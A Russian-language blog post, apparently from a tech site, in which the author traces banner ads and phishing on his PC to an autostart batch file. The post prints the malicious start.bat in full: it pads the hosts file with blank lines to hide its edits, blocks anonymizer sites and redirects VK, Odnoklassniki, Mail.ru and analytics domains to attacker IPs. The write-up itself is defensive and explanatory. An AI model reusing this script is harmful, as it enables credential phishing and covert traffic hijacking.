Захватывающее действие разворачивается на Вашем компьютере совсем неожиданно и, как правило, в самый неподходящий момент. Начинается все просто, Вы отправляетесь на свой любимый сайт или в социальную сеть и обнаруживаете что-то необычное…
Так случилось и с моим компьютером. Захожу на сайт, вижу в левом углу неприличную картинку (рекламный баннер). В голове промелькнуло 2 мысли:
- заражен мой браузер
- заражен сайт
Побродив по нескольким сайтам и не увидев этого самого баннера, я сделал вывод, что все-таки заражен сайт. Так как это был сайт довольно крупной компании, я позвонил в тех. поддержку. Выслушали, выразили благодарность за бдительность, но во время разговора сообщили, что у них этот баннер не отображается ни под одним браузером.
Анализ сайта
Начал исследовать сайт, и вижу, что в коде Яндекс метрики есть такая строчка:
<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript>
Именно она и показывает баннер. Не совсем понятно, как это делается в теге <nosctipt></nosctipt>, однако ясно, что ссылка на картинку фишинговая.
Файл hosts
Отправляемся в файлик hosts (%windir%system32driversetchosts).
И вот тут мной была допущена серьезная ошибка: открыл, посмотрел, все число, закрыл. Однако не обратил внимания на появившуюся полосу прокрутки.
Автозагрузка
Отправляемся в автозагрузку (Пуск->Выполнить->msconfig) и обнаруживаем там файлик start.bat со следующим содержимым:
FOR /L %%i IN (1,1,255) DO echo. >> %windir%system32driversetchosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%system32driversetchosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%system32driversetchosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%system32driversetchosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%system32driversetchosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%system32driversetchosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%system32driversetchosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%system32driversetchosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%system32driversetchosts.txtСтановится понятно, первая строка батника в hosts создает 255 пустых строк. Именно поэтому, заглянув в hosts я ничего не увидел. Нужно было отправиться в самый конец, чтобы заметить модификацию.
Таким образом, на всех сайтах, на которых стоял Google Analytics и Яндекс метрика, появлялся этот рекламный баннер. А во всех социальных сетях подкладывался фишинговый сайт, где можно было легко предоставить доступ к своей страничке «неприятелю».
Стоило удалить из автозапуска батник, почистить hosts, как все встало на свои места. Способ проникновения вредителя на компьютер так и остался загадкой.
Заключение
Во всей этой истории удивительным остается следующее:
- На компьютере стоял антивирус Касперского, который не подавал никаких признаков борьбы с модификацией файла hosts, добавлением батника в автозагрузку и появлением баннера (даже после полной проверки).
- ОС Windows 7 совершенно спокойно разрешала исполнять start.bat при каждой загрузке.
Автор: sonofking
